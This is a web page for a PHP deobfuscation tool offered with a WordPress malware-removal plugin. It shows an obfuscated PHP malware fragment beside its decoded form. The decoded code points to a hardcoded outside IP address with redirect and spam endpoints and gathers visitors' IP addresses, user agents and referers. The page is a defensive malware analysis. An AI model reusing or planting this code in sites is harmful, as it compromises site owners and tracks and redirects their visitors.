Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; $oOooOOoOO = isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[37]]) && $_SERVER[$O[4...



Obfuscated php code

<?php
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
$oOooOO = 'z0823_7';
$oOooOOoO = "http://198.204.238.74/z0823_7/";
$oOooOOoOO = isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[37]]) && $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[37]] !== $O[8] . $O[13] . $O[13] ? $O[15] . $O[4] . $O[4] . $O[9] . $O[11] . $O[62] . $O[63] . $O[63] : $O[15] . $O[4] . $O[4] . $O[9] . $O[62] . $O[63] . $O[63];
$oOoooOOoOO = $_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]];
$ooOOoooOOoOO = $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[41] . $O[34] . $O[37] . $O[30]];
$ooOOOoooOOoOO = $_SERVER[$O[35] . $O[41] . $O[35] . $O[52] . $O[37] . $O[28] . $O[44] . $O[39]];
$ooOOOOoooOOOoOO = $_SERVER[$O[37] . $O[28] . $O[29] . $O[48] . $O[28] . $O[29] . $O[52] . $O[50] . $O[36] . $O[51] . $O[28]];
$ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO;
$oooOOOOoooOOOooOO = $oOooOOoO . $O[63] . $O[7] . $O[24] . $O[12] . $O[10] . $O[4] . $O[10] . $O[59] . $O[9] . $O[15] . $O[9];
$ooooOOOOoooOOOooO = $oOooOOoO . $O[63] . $O[25] . $O[10] . $O[9] . $O[59] . $O[9] . $O[15] . $O[9];
$ooooOOOOoooOOOooOoo = $oOooOOoO . $O[63] . $O[16] . $O[6] . $O[25] . $O[9] . $O[59] . $O[9] . $O[15] . $O[9];
$oooooOOoooOOOoooOoo = $oOooOOoO . $O[63] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11] . $O[59] . $O[9] . $O[15] . $O[9];
$ooooooooOOOOoooOOoooOO = $oOooOOoO . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[9] . $O[15] . $O[9];
$ooooooOoOoooOOOooo[$O[6] . $O[11] . $O[2] . $O[3] . $O[52] . $O[10] . $O[14] . $O[2] . $O[24] . $O[4]] = strtolower(isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]] : '');
$oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]] : '');
$ooooooOoOoooOOOooo[$O[15] . $O[4] . $O[4] . $O[9] . $O[52] . $O[6] . $O[11] . $O[2] . $O[3] . $O[52] . $O[10] . $O[14] . $O[2] . $O[24] . $O[4]] = $oooOoOOooOoooOOOoOoOoOoOoO;
$oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[29] . $O[28] . $O[39] . $O[28] . $O[29] . $O[28] . $O[29]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[29] . $O[28] . $O[39] . $O[28] . $O[29] . $O[28] . $O[29]] : '';
$ooooOOOOoooOOOoooOOO = $_SERVER[$O[29] . $O[28] . $O[51] . $O[34] . $O[30] . $O[28] . $O[52] . $O[36] . $O[38] . $O[38] . $O[29]];
$ooooooOoOoooOOOooo[$O[7] . $O[9]] = $ooooOOOOoooOOOoooOOO;
$ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[13] . $O[2] . $O[3] . $O[2] . $O[3]] = $oooOOOooOoooOOOooooOoOoOoOoO;
?>

Decoded(de-Obfuscated) php code

<?php

global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
$oOooOO = 'z0823_7';
$oOooOOoO = "http://198.204.238.74/z0823_7/";
$oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
$oOoooOOoOO = $_SERVER["REQUEST_URI"];
$ooOOoooOOoOO = $_SERVER["HTTP_HOST"];
$ooOOOoooOOoOO = $_SERVER["PHP_SELF"];
$ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"];
$ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO;
$oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php";
$ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php";
$ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php";
$oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php";
$ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php";
$ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$ooooooOoOoooOOOooo["http_user_agent"] = $oooOoOOooOoooOOOoOoOoOoOoO;
$oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"];
$ooooooOoOoooOOOooo["ip"] = $ooooOOOOoooOOOoooOOO;
$ooooooOoOoooOOOooo["referer"] = $oooOOOooOoooOOOooooOoOoOoOoO;

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.